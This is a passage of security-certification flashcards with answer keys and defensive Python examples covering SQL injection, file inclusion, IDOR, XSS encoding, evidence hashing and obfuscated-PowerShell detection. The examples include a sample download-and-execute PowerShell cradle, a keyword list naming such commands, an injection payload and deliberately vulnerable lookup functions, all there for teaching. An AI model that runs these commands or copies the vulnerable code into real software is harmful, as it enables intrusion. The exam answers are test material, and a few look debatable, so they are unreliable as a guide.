While input validation is important, output encoding specifically addresses the secure handling of user-generated content when displayed, not when stored.

Output encoding focuses on preventing cross-site scripting (XSS) attacks, not structured query language (SQL) injection attacks. Parameterized queries protect against SQL injection attacks.

Ensuring that the system stores user input in a parameterized query is a technique for preventing SQL injection attacks, not an outcome of output encoding.

47

An e-commerce platform has identified a stack overflow vulnerability in one of its critical applications. The organization has tasked a security analyst with suggesting effective controls to mitigate the risk associated with this vulnerability. Considering the nature of the vulnerability, which control should the analyst recommend?

A.Implementing input validation and sanitization

B.Enabling secure cookie flags

C.Applying Content Security Policy (CSP)

D.Employing Address Space Layout Randomization (ASLR)

D.Employing Address Space Layout Randomization (ASLR)

ASLR is a security technique that randomizes the base addresses of the stack, heap, and loaded libraries each time a process starts, so an exploit cannot rely on fixed addresses for its return target or payload. It raises the cost of exploiting a stack overflow but does not remove the bug: the missing bounds check should still be fixed, and ASLR is normally deployed together with stack canaries and a non-executable stack (DEP/NX), because an information leak can defeat ASLR on its own. Secure cookie flags and Content Security Policy address browser-side attacks, not memory corruption in the application.

48

A software development company has already included planning, implementation, testing, and maintenance stages in its software development lifecycle (SDLC). Which of the following stages did the company NOT include? (Select the two best options.)

A.Testing

B.Design

C.Deployment

D.Post-implementation review

B.Design

C.Deployment

49

A healthcare organization is developing a web-based patient records system. During the testing phase, security analysts identified several injection flaws that could potentially compromise sensitive patient data. Which controls should the organization implement to mitigate the risks associated with injection flaws?

A.Employ least privilege principles for database access

B.Implement parameterized queries and input validation

C.Use cookies to store user session data

D.Disable security headers in the application

B.Implement parameterized queries and input validation

Parameterized (prepared) queries send user input to the database as bound values rather than as part of the SQL statement, so the input can never change the query's structure; input validation in front of them rejects malformed data early. Least privilege for the database account is good defense in depth because it limits what a successful injection can read or change, but it does not prevent the injection itself.
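
As an added illustration (not code from the flashcards), the same lookup written three ways in Python with an in-memory SQLite table standing in for the patient records database: string concatenation, a bound parameter, and a bound parameter behind input validation. The table contents and the MRN format are constructed for the example.

```python
import re
import sqlite3

# Hypothetical identifier format the records system issues; nothing else is accepted.
MRN_RE = re.compile(r"^MRN-\d{4}$")


def make_sample_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the patient records database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patients (id INTEGER PRIMARY KEY, mrn TEXT, name TEXT)")
    conn.executemany(
        "INSERT INTO patients (mrn, name) VALUES (?, ?)",
        [("MRN-1001", "A. Patel"), ("MRN-1002", "B. Okafor"), ("MRN-1003", "C. Nguyen")],
    )
    conn.commit()
    return conn


DB = make_sample_db()


def lookup_vulnerable(conn: sqlite3.Connection, mrn: str) -> list:
    """String concatenation: the caller's input is parsed as part of the SQL statement."""
    sql = "SELECT name FROM patients WHERE mrn = '" + mrn + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, mrn: str) -> list:
    """Bound parameter: the driver passes the value separately, so it can only ever be data."""
    return [row[0] for row in conn.execute("SELECT name FROM patients WHERE mrn = ?", (mrn,))]


def is_valid_mrn(mrn: str) -> bool:
    """Allow-list validation: accept only the exact identifier format the application uses."""
    return MRN_RE.fullmatch(mrn) is not None


def lookup_hardened(conn: sqlite3.Connection, mrn: str) -> list:
    """Validate first, then bind: malformed input never reaches the database at all."""
    if not is_valid_mrn(mrn):
        raise ValueError("malformed MRN")
    return lookup_parameterized(conn, mrn)
```

With the classic payload ' OR '1'='1 the concatenated query returns every patient, the parameterized query looks for a record whose MRN literally equals the payload and returns nothing, and the hardened version refuses the input before a query is built.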

50

A security analyst is examining an incident where an attacker exploited a web application to gain unauthorized access to files and resources on the server. The attacker manipulated user input to include external files or traverse the server's directory structure. Which of the following web vulnerabilities are most likely to be responsible for this scenario? (Select the two best options.)

A.Server-Side Request Forgery (SSRF)

B.Cross-Site Request Forgery (CSRF)

C.Local File Inclusion (LFI)

D.Remote File Inclusion (RFI)

C.Local File Inclusion (LFI)

D.Remote File Inclusion (RFI)

Local File Inclusion (LFI) is a web vulnerability in which user input controls which file on the server is included or read, often combined with ../ traversal sequences to reach files outside the web root, such as configuration files or password files.

Remote File Inclusion (RFI) is a web vulnerability in which user input supplies a URL, causing the application to fetch and include an attacker-hosted file, which commonly leads to code execution on the server.

While Server-Side Request Forgery (SSRF) can lead to unauthorized access to internal resources, it does not involve including external files or traversing the server's directory structure.

While Cross-Site Request Forgery (CSRF) involves malicious requests, it focuses on exploiting a user's existing authentication session rather than including external files or traversing the server's directory structure.
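
The following is an added example, not part of the original card: a Python check that classifies a user-supplied include path as a remote include attempt, a traversal out of the document root, or a safe path inside it. The document root path is hypothetical and the check is purely lexical so it runs offline.

```python
import posixpath
import re
from typing import Optional, Tuple
from urllib.parse import unquote

# Hypothetical document root the include logic is allowed to read from.
BASE_DIR = "/var/www/app/public"

# Anything that starts with a URL scheme (http:, ftp:, data:, php:) is a remote/wrapper include.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.IGNORECASE)


def check_include(requested: str, base: str = BASE_DIR) -> Tuple[str, Optional[str]]:
    """Classify an include path.

    Returns ("ok", resolved_path), ("rfi", None) for a remote or wrapper URL,
    or ("traversal", None) when the resolved path would leave base.
    """
    # One round of percent-decoding, as the web server does before the application
    # sees the value; decoding again would reintroduce the double-encoding trick (%252e%252e).
    decoded = unquote(requested)
    if "\x00" in decoded:
        return ("traversal", None)            # NUL-byte truncation attempts
    if SCHEME_RE.match(decoded) or decoded.startswith("//"):
        return ("rfi", None)
    # posixpath.join discards base when decoded is absolute, which the containment check catches.
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    if posixpath.commonpath([base, candidate]) != base:
        return ("traversal", None)
    return ("ok", candidate)
```

On a real filesystem the lexical check should be followed by os.path.realpath on the candidate, because a symlink inside the document root can still point outside it.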

51

An e-commerce company recently suffered a data breach, and a security audit revealed several vulnerabilities in their web application. The company wants to improve its web application security by following secure coding best practices and enhancing session management. Which of the following actions should the company take to achieve this?

A.Employ HTTPS for all data transmissions

B.Utilize hard-coded credentials

C.Use short session timeouts

D.Disable input validation

C.Use short session timeouts

Using short session timeouts is a secure coding best practice for session management. Short timeouts reduce the window in which a stolen or abandoned session token can be used; an idle timeout is typically paired with an absolute maximum session lifetime.

HTTPS protects the session token in transit and should be in place (together with the Secure and HttpOnly cookie flags), but it is a transport control rather than a session-management practice. Hard-coded credentials and disabled input validation weaken security rather than improve it.

52

A security analyst is looking for the appropriate tools to detect and analyze malware in the organization's network. What tools allow the analyst to detect and analyze malware through virtualized environments? (Select the two best options.)

Cuckoo Sandbox

Snort

Joe Sandbox

VirusTotal

Cuckoo Sandbox

Joe Sandbox

53

CSIRT

computer security incident response team

54

CERT

computer emergency response team

55

OSINT

Open Source INTelligence; gathered from publicly available sources

56

ISAC

(Information Sharing and Analysis Center) Not-for-profit group set up to share sector-specific threat intelligence and security best practices amongst its members.

57

IOC

Indicators of Compromise

58

Single Pane of Glass

A single pane of glass is a management console that presents data from multiple sources in a unified display

59

Device fingerprinting

Device fingerprinting describes the effort taken to identify details about a device more precisely. While a map or discovery scan looks for connected devices, a fingerprint scan focuses attention on an individual device.

60

Fuzzing (Fuzz Testing)

Identifying problems and vulnerabilities in software (web applications, parsers, network services) by deliberately feeding it malformed, random, or unexpected input and watching for crashes, hangs, or incorrect handling.

61

SCADA

Supervisory control and data acquisition. Industrial control systems that monitor and control equipment in large facilities such as power plants or water treatment plants, typically spanning multiple geographically distributed sites.

62

A company is debating alternative methods for vulnerability scans due to the multiple attempts made on the company's network. The attempts have occurred over the previous year. Which of these methods will provide the most comprehensive evaluation of company devices?

Agentless

Noncredentialed

Agent

Credentialed

Credentialed

Credentialed scans provide the most comprehensive evaluation of devices. By authenticating to the device, the scanner can enumerate all installed software, the file system, configuration data, user accounts, and many other attributes.

63

Maltego

a graphical link analysis tool, it lets you visualize connections within complex data sets, displaying interconnected links

64

The network team is assessing the cloud infrastructure of an Amazon Web Services (AWS) account and needs to determine which groups have access to the cloud storage. Where should the network team search for the information in the HTML report?

Network VPCs

S3 buckets config

Config dashboard

iam__enum_permissions module

S3 buckets config

The S3 buckets are the storage assets on AWS, and the S3 buckets config section will show a list of groups with access to the buckets via the Identity and Access Management (IAM) policies.

65

When reviewing the issues on the Arachni web user interface (UI), how can a web administrator determine the way in which the system detected a cross-site scripting vulnerability on a targeted site?

Check the input section

Check the repeater section

Check the dispatchers section

Check the intruder section

Check the input section

66

Which of the following tools will allow a security analyst to run the module auxiliary/admin/networking/cisco_secure_acs_bypass to scan for vulnerabilities on a Cisco device?

Pacu

Recon-ng

Metasploit Framework

Nmap

Metasploit Framework

67

Nikto

web server scanner that the security analyst can use to specifically identify vulnerabilities in web servers. It can quickly scan MULTIPLE web servers and provide comprehensive information on any detected vulnerabilities.

68

Open Source Security Testing Methodology Manual (OSSTMM)

The OSSTMM is a comprehensive security testing methodology that takes the context of each vulnerability into account. It provides a systematic approach to identifying and assessing vulnerabilities in various systems, including network infrastructure.

69

A web developer at a startup company is building a new web application. The developer wants to ensure that the application is secure from various types of attacks. Which of the following frameworks would be the most appropriate for the web developer to use?

A.OWASP Web Security Testing Guide

B.International Organization for Standardization (ISO) 27001/27002

C.Open Source Security Testing Methodology Manual (OSSTMM)

D.Control Objectives for Information and related Technology (COBIT)

A.OWASP Web Security Testing Guide

70

A security analyst at a software development company must identify network threats. They recently discovered a misconfigured server. What should the analyst focus on to secure network and system architecture?

Monitoring network traffic

Assessing attack stage and web application vulnerabilities

Investigating physical security measures

Implementing industry best practices

Assessing attack stage and web application vulnerabilities

71

A cybersecurity professional must analyze a security incident within an organization. Applying knowledge of attack methodology frameworks is essential to manage the situation effectively and prevent future attacks. Which action should the professional prioritize in this context?

Deploy additional security monitoring tools

Implement stricter access controls on sensitive data

Determine the scope of the incident

Preserve the integrity of digital evidence

Determine the scope of the incident

72

A cybersecurity analyst is investigating a security incident and must ensure that the collected data remains uncompromised and retains its integrity. Which of the following actions would be the most appropriate to achieve this goal while conducting the investigation?

Regularly back up the collected data to an external storage device

Create and store cryptographic hash values of the collected data

Use a secure collaboration platform to share the data with team members

Encrypt the collected data using a secure encryption algorithm

Create and store cryptographic hash values of the collected data

The analyst can ensure data integrity and verify that no one has tampered with the data collected during the investigation by creating and storing cryptographic hash values. This supports evidence preservation and maintains the chain of custody.

While encryption helps protect data confidentiality, it does not directly ensure data integrity, which is the primary goal in this scenario.
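
As an added example (not code from the flashcards), the hash-at-collection, verify-later workflow in Python: each evidence item is hashed with SHA-256 into a manifest when it is collected, and the same items are re-hashed during the investigation to detect modification or loss. The demo() walkthrough builds three constructed files in a temporary directory, tampers with one and deletes another; the file names and contents are invented for the example.

```python
import hashlib
import os
import tempfile
from typing import Dict, Iterable


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream the file so a multi-gigabyte disk or memory image need not fit in RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(paths: Iterable[str]) -> Dict[str, str]:
    """Hash every item at collection time; this manifest is what gets recorded and signed."""
    return {os.path.basename(p): sha256_file(p) for p in paths}


def verify_manifest(paths: Iterable[str], manifest: Dict[str, str]) -> Dict[str, str]:
    """Re-hash later and compare: 'ok', 'MODIFIED' or 'MISSING' per item."""
    result: Dict[str, str] = {}
    for p in paths:
        name = os.path.basename(p)
        if not os.path.exists(p):
            result[name] = "MISSING"
        elif sha256_file(p) != manifest[name]:
            result[name] = "MODIFIED"
        else:
            result[name] = "ok"
    return result


def demo() -> Dict[str, str]:
    """Constructed walkthrough: collect three items, then one is altered and one is lost."""
    with tempfile.TemporaryDirectory() as d:
        items = {
            "auth.log": b"May 3 10:14:02 host sshd[812]: Accepted publickey for svc from 10.0.0.7\n",
            "memdump.raw": bytes(4096),
            "netflow.csv": b"src,dst,bytes\n10.0.0.7,203.0.113.9,51200\n",
        }
        paths = []
        for name, data in items.items():
            p = os.path.join(d, name)
            with open(p, "wb") as f:
                f.write(data)
            paths.append(p)
        manifest = build_manifest(paths)
        with open(paths[1], "r+b") as f:   # flip one byte deep inside the memory image
            f.seek(100)
            f.write(b"\xff")
        os.remove(paths[2])                 # the netflow export goes missing
        return verify_manifest(paths, manifest)
```

The manifest itself must be protected (signed, or stored on write-once media with its own hash recorded in the case log), otherwise an attacker who can alter the evidence can simply recompute the hashes.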

73

A security analyst is researching an incident that has affected their organization's web server. The analyst must understand the attacker's tactics, techniques, and procedures (TTPs) to prevent future incidents. Which of the following should the analyst prioritize to study and apply attack methodology frameworks effectively?

Implementing a business continuity (BC)/disaster recovery (DR) plan

Performing root cause analysis

Conducting security awareness training

Utilizing threat intelligence tools

Utilizing threat intelligence tools

74

A security analyst must evaluate the security of a web application. Which tools or methods would be most useful in identifying potential vulnerabilities in the application's code?

Conducting tabletop exercises

Conducting manual code review

Performing a penetration test on the web application

Performing static application security testing

Performing static application security testing (SAST)

75

An organization is reviewing its incident response plan and wants to improve its overall security posture by streamlining the authentication process for its employees during a security incident. Which of the following approaches can help achieve this goal without compromising security?

Security information and event management (SIEM)

Intrusion detection system (IDS)

Passwordless authentication

Federation

Federation

Federation allows using a single set of credentials across multiple systems to streamline the authentication process during an incident without compromising security.

76

ScoutSuite

ScoutSuite is an audit tool that collects data such as security misconfigurations. The tool also provides a report of discovered objects, such as virtual machines and containers, which is the consultant's goal.

77

Arachni

Arachni is an open-source web scanner that tests many vulnerabilities in HTML forms, including code injection, structured query language (SQL) injection, and cross-site scripting (XSS). However, Arachni is not useful to the consultant in this case.

78

OpenVAS (Open-source Scanner)

OpenVAS is an open-source scanner used to identify vulnerabilities in systems. The consultant could use OpenVAS to obtain Common Vulnerability Scoring System (CVSS) scores but not for object identification.

79

A security analyst compiles a risk report and utilizes the Common Vulnerability Scoring System (CVSS) scores to determine strategies for varying scenarios. If the analyst considers and calculates impact data and confidentiality metrics, which areas are of concern? (Select the two best options.)

The number of systems impacted

The extent to which data is disclosed

The cost to remedy the vulnerability

The potential damage caused by a vulnerability

The extent to which data is disclosed

The potential damage caused by a vulnerability

80

An unauthenticated attacker exploited a company's web portal that contains customer information, where customers can view their account profile, such as their name, email address, and account balance. Each customer has a unique ID used to retrieve their information from the database. However, the attacker changed the customer ID parameter in the URL to access customers' information. What kind of web application vulnerability did the attacker exploit?

A.Broken access control

B.Security misconfiguration

C.Software and data integrity failures

D.Injection

A.Broken access control

The attacker changed an identifier in the URL and the application returned another customer's record without checking authorization. This is an insecure direct object reference (IDOR), a form of broken access control: the server trusts a client-supplied ID instead of verifying that the requester is authenticated and is the owner of (or otherwise authorized for) that object.
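
An added example (not from the original card) of the vulnerable lookup beside its hardened form in Python. The account records, customer IDs and status codes are constructed for the example; session_user stands for the customer ID established by the login session, or None when the caller is unauthenticated.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass
class Account:
    customer_id: int
    name: str
    email: str
    balance: float


# Constructed sample data; in the real portal this comes from the database.
ACCOUNTS: Dict[int, Account] = {
    1001: Account(1001, "Ana", "ana@example.test", 120.50),
    1002: Account(1002, "Ben", "ben@example.test", 980.00),
}


def profile_vulnerable(session_user: Optional[int], requested_id: int) -> Optional[Account]:
    """Trusts the ID from the URL: any caller, even unauthenticated, can read any record."""
    return ACCOUNTS.get(requested_id)


def profile_hardened(session_user: Optional[int], requested_id: int) -> Tuple[int, Optional[Account]]:
    """Authenticate first, then enforce ownership on every object lookup.

    Returns an HTTP-style status and the record. A foreign ID and a nonexistent ID both
    yield 404, so the response does not reveal which customer IDs exist.
    """
    if session_user is None:
        return (401, None)
    account = ACCOUNTS.get(requested_id)
    if account is None or account.customer_id != session_user:
        return (404, None)
    return (200, account)
```

The safest design removes the parameter altogether and looks the record up by the session's own customer ID; where an ID must be accepted (shared or delegated records), the ownership or role check has to run on every request, not only on the page that displays the link.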

82

A cybersecurity analyst uses the Common Vulnerability Scoring System (CVSS) to evaluate the severity of a vulnerability in a company's software. When using the CVSS to evaluate the severity of a software vulnerability, what specific factors should the analyst consider, and why is CVSS an important tool for IT teams to use? (Select the two best options.)

A.Type of vulnerability, affected system, and potential impact; to prioritize remediation efforts

B.Severity, number of systems affected, and potential impact; to allocate resources more effectively

C.Likelihood of exploitation, potential impact, and patch availability; to provide an objective measure of risk

D.Cost of fixing, number of systems affected, and potential impact; to provide a standardized method for assessing severity

A.Type of vulnerability, affected system, and potential impact; to prioritize remediation efforts

C.Likelihood of exploitation, potential impact, and patch availability; to provide an objective measure of risk

83

A company stores sensitive data on their servers and uses encryption to protect it. However, the encryption algorithm is outdated and has known vulnerabilities. What type of vulnerability does this situation describe?

A.Cryptographic failures

B.Broken access control

C.Security misconfiguration

D.XSS

A.Cryptographic failures

84

A recently hired risk manager is taking over the organization's operational control responsibilities. Which control responsibility would the risk manager assume in a cybersecurity environment?

A.Encryption of sensitive data during storage and transmission

B.Implementation of firewalls and intrusion detection systems

C.Configuring network devices to synchronize time using Network Time Protocol (NTP)

D.Conducting background checks on new employees

D.Conducting background checks on new employees

85

A network administrator analyzes data and prioritizes vulnerabilities to ensure the organization's security. The administrator has received an alert regarding a zero-day vulnerability in one of the organization's critical systems. What factors should the network administrator consider to prioritize this vulnerability? (Select the two best options.)

A.Availability of patches

B.Impact of the vulnerability

C.Level of sophistication of threat actors

D.Privacy of the vulnerability

B.Impact of the vulnerability

C.Level of sophistication of threat actors

86

A web administrator is responsible for the security of a web application. The administrator wants to prevent cross-site scripting (XSS) attacks where user input is reflected back and executed as part of the web page content. Which of the following best practices should the administrator use to achieve this goal?

A.Input validation

B.Output encoding

C.Parameterized queries

D.Strong password policies

B.Output encoding

Output encoding is a primary defensive technique against cross-site scripting (XSS) attacks. By ensuring that user input displayed on a web page is treated as data rather than executable code, output encoding prevents the execution of malicious scripts.

While input validation is vital for ensuring that only properly formatted data enters the system, it alone doesn't address the specific scenario of XSS attacks where user input is echoed back and executed as part of the web page.
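
As an added example serving this card and the earlier product-review card (not code from the flashcards), the rendering step in Python with and without output encoding, for the three output contexts a practitioner meets most: HTML body text, an HTML attribute value, and a URL query parameter. The page fragments are invented; the point is that each context needs its own encoder and that the encoder runs at display time, regardless of what was stored.

```python
import html
from urllib.parse import quote


def render_review_vulnerable(review: str) -> str:
    """Raw interpolation: whatever the reviewer typed becomes markup in the page."""
    return '<p class="review">' + review + '</p>'


def render_review_encoded(review: str) -> str:
    """HTML body context: <, >, &, and quotes become entities and render as visible text."""
    return '<p class="review">' + html.escape(review, quote=True) + '</p>'


def render_search_box(last_query: str) -> str:
    """Attribute context: quotes must be encoded, or the value can close the attribute
    and start a new one such as an onmouseover handler."""
    return '<input type="text" name="q" value="' + html.escape(last_query, quote=True) + '">'


def render_next_link(query: str) -> str:
    """URL parameter context: percent-encoding is the right encoder here, not HTML entities."""
    return '<a href="/search?q=' + quote(query, safe="") + '">next page</a>'


def contains_live_markup(rendered: str) -> bool:
    """Crude check used in the test: did a raw script tag or injected attribute survive?"""
    lower = rendered.lower()
    return "<script" in lower or '" onmouseover="' in lower
```

Encoding is applied on output because the same stored string may be rendered in several contexts (HTML page, JSON API, e-mail), and because content stored before the fix is still displayed safely afterwards; input validation remains worthwhile for rejecting data that is wrong for the field, but it cannot know in which context the data will later appear.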

87

After detecting a security breach in one of the systems, the network administrator at a large organization faces a highly complex situation that does not allow them to follow the incident response process outlined in the manual. What would be the most appropriate course of action for the network administrator to take if applying compensating controls?

A.Implement a control requiring a root cause analysis to identify the solution to prevent the breach from recurring.

B.Implement a control that prioritizes the safety and security of personnel over the security breach.

C.Implement a control that emphasizes removing malware, backdoors, and compromised accounts from the hosts.

D.Implement a control that focuses on enhancing the security through a unique method but achieve the same purpose

D.Implement a control that focuses on enhancing the security through a unique method but achieve the same purpose

By focusing on enhancing security through a unique method that achieves the same purpose, the network administrator is applying a compensating control in this scenario.

A root cause analysis may be useful in identifying the cause of the security breach, but it is not a compensating control.

88

An IT professional is responsible for implementing vulnerability scanning methods for their organization's network. The organization has tasked the IT professional with deciding whether to use an agent-based or agentless vulnerability scanning method. What factors should the IT professional consider when making this decision? (Select the two best options.)

A.The security clearance of the personnel conducting the scan

B.The geographic location of the network being scanned

C.The size of the network being scanned

D.The presence of network firewalls

C.The size of the network being scanned

D.The presence of network firewalls

89

A company is implementing a PKI to enhance the validity of its communications. What is the purpose of PKI in this instance?

A.To provide secure and private communication over the internet

B.To verify the authenticity of digital documents and the identity of users or devices

C.To encrypt data transmissions between servers

D.To detect and prevent unauthorized access to the network

B.To verify the authenticity of digital documents and the identity of users or devices

Public Key Infrastructure (PKI) binds public keys to identities through certificates issued by a trusted certificate authority, so that users, devices, and digitally signed documents can be authenticated and, where needed, communications encrypted. Issuing, distributing, and revoking those keys and certificates is its core function.

90

XML (eXtensible Markup Language)

eXtensible Markup Language (XML) is a text-based markup language used to structure and transfer data. An important differentiator of XML is that the user defines the data tags.

91

A company has just experienced a cyberattack, and its incident response team is in the post-incident activity phase. What is the purpose of forensic analysis during this phase?

A.To identify the cause, scope, and impact of the incident

B.To recover lost data and restore operations

C.To identify and remediate vulnerabilities

D.To update security policies and prevent future attacks

A.To identify the cause, scope, and impact of the incident

92

A large company has recently discovered vulnerabilities in its system. After analyzing the data, the company must prioritize these vulnerabilities based on exploitability and weaponization. Which of the following would be important for the company to consider when analyzing the data to achieve their requirements? (Select the two best options.)

A.The level of sophistication of threat actors targeting the vulnerability

B.The availability of patches for the vulnerability

C.The number of systems and people affected by the vulnerability

D.The potential damage caused by successful exploitation of the vulnerability

A.The level of sophistication of threat actors targeting the vulnerability

B.The availability of patches for the vulnerability

Exploitability and weaponization describe how easily, and how widely, a vulnerability can be turned into a working attack: whether capable threat actors are already targeting it and whether a patch exists to close it. The number of affected systems and the potential damage relate to impact, which is a separate prioritization factor.

93

A security analyst is developing a python script to analyze regular text from log files. The script will identify potential security incidents and generate alerts for further investigation. Which of the following best describes the security concept the analyst needs to implement in the python script to detect obfuscated text? (Select the two best options.)

A.Code signature verification

B.Regular expression

C.String manipulation

D.Header inspection

B.Regular expression

C.String manipulation
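
The following is an added example, not code from the flashcards: a small Python detector that uses a regular expression to find a base64 blob following PowerShell's -EncodedCommand switch, then string manipulation (base64 decode, UTF-16LE decode, lower-casing) to expose the command underneath and match it against plain-text indicators. The log lines are constructed, and the encoded command is generated inside the block so it runs offline.

```python
import base64
import binascii
import re
from typing import Dict, List

# Matches -e, -ec, -enc or -EncodedCommand followed by a base64 blob (longest alternative first).
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/]{16,}={0,2})", re.IGNORECASE)
# Strings that commonly show up once the encoding layer is stripped off.
INDICATOR_RE = re.compile(r"(?:invoke-expression|iex|downloadstring|invoke-webrequest|iwr|frombase64string)", re.IGNORECASE)

# Constructed sample: the encoded command is produced here from a plain-text command.
PLAINTEXT_COMMAND = "IEX (iwr http://10.0.0.5/a.ps1 -UseBasicParsing)"
ENCODED_COMMAND = base64.b64encode(PLAINTEXT_COMMAND.encode("utf-16le")).decode("ascii")
SAMPLE_LOGS = [
    "2024-05-03T10:14:02Z ws07 4688 New Process: C:\\Windows\\System32\\cmd.exe /c dir",
    "2024-05-03T10:14:05Z ws07 4688 New Process: powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED_COMMAND,
    "2024-05-03T10:14:09Z ws07 4624 Logon: user=svc_backup type=3",
]


def decode_powershell_b64(blob: str) -> str:
    """PowerShell -EncodedCommand carries UTF-16LE text, not UTF-8; return '' if not decodable."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return ""
    return raw.decode("utf-16le", errors="replace").strip()


def scan_lines(lines: List[str]) -> List[Dict]:
    """Return one finding per line that carries a decodable encoded command."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = ENC_RE.search(line)
        if not match:
            continue
        decoded = decode_powershell_b64(match.group(1))
        if not decoded:
            continue
        indicators = sorted({hit.lower() for hit in INDICATOR_RE.findall(decoded)})
        findings.append({"line": number, "decoded": decoded, "indicators": indicators})
    return findings
```

The regular expression finds the obfuscated blob; the string-handling step is what makes it useful, because a detection that only matches on "-EncodedCommand" cannot tell a benign management script from a download cradle, while the decoded text can be fed to the same indicator rules used for plain-text command lines.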

94

A company has recently upgraded to the latest version of the web application. During a review of the logs, the security analyst notices an unauthorized change made to the web application by an unknown user. Which of the following logs would most likely provide information about the unauthorized change?

A.System log

B.Application log

C.Event log

D.Security log

B.Application log

95

A retail company is developing an incident response plan and wants to test it to ensure it is effective. The company has decided to conduct a tabletop exercise as part of the preparation phase. What would be a tabletop exercise in this context?

A.A simulated attack on the company's network

B.A review of the company's security policies

C.A discussion-based exercise that simulates a cyber incident

D.A physical test of the company's disaster recovery plan

C.A discussion-based exercise that simulates a cyber incident

96

A network administrator is responsible for ensuring the security of an organization's network. The organization has tasked the administrator with implementing vulnerability scanning methods and concepts to identify potential vulnerabilities. As part of their efforts, the administrator has decided to segment the network. What scanning method would be most helpful in identifying potential vulnerabilities in the segmented network?

A.Map/discovery scan

B.Device fingerprinting

C.Static analysis

D.Dynamic analysis

B.Device fingerprinting

Device fingerprinting focuses on identifying details about individual devices, such as their purpose, vendor, software versions, configuration details, and the existence of vulnerabilities. Device fingerprinting is useful in identifying potential vulnerabilities in a segmented network where traditional scanning methods may not work effectively.

97

A security analyst wants to use a web application scanner to test the security of a web application. Which of the following is a feature of Burp Suite that could support the security analyst's requirements?

A.Testing for vulnerabilities in the application source code

B.Assessing the security of the underlying operating system

C.Detecting malware and viruses on the web server

D.Intercepting and modifying HTTP requests and responses

D.Intercepting and modifying HTTP requests and responses

98

A company has contracted a third party to develop a proprietary software application to manage its manufacturing processes. What is a common inhibitor to vulnerability management reporting and communication in this context, specifically for organizations with proprietary systems? (Select the three best options.)

A.Lack of understanding of the application's underlying architecture and dependencies

B.Fear of revealing proprietary information to external parties

C.Lack of resources to test and remediate vulnerabilities in a proprietary system

D.Incompatibility with third-party vulnerability management tools

A.Lack of understanding of the application's underlying architecture and dependencies

B.Fear of revealing proprietary information to external parties

C.Lack of resources to test and remediate vulnerabilities in a proprietary system

99

A newly hired cybersecurity manager oversees the organization's operational control responsibilities. Which of the following is an example of this responsibility?

A.Monitoring the network for unauthorized access attempts

B.Conducting a risk assessment to identify potential vulnerabilities in the system

C.Installing antivirus software on all company computers

D.Creating a strong password policy for employees to follow

A.Monitoring the network for unauthorized access attempts

100

A company is in the process of implementing a vulnerability scanning program to improve its cyber defenses. The company wants to know which scanning method (agent or agentless) would most effectively identify vulnerabilities on its network. What are the advantages of implementing agent-based compared to agentless in this context? (Select the three best options.)

A.Agent-based scanning, unlike agentless, provides detailed and accurate information through direct access to system resources.

B.Agent-based scanning, compared to agentless, provides continuous and real-time monitoring due to its host presence.

C.Agent-based scanning operates independently of network connectivity, unlike agentless scanning, which requires a stable network connection.

D.Agent-based scanning ensures that scanning activities do not affect network bandwidth since they operate locally on each host.

A.Agent-based scanning, unlike agentless, provides detailed and accurate information through direct access to system resources.

B.Agent-based scanning, compared to agentless, provides continuous and real-time monitoring due to its host presence.

C.Agent-based scanning operates independently of network connectivity, unlike agentless scanning, which requires a stable network connection.

Option D is incorrect: an agent collects data locally but still reports its results to the central manager over the network, so it reduces scan traffic rather than eliminating it.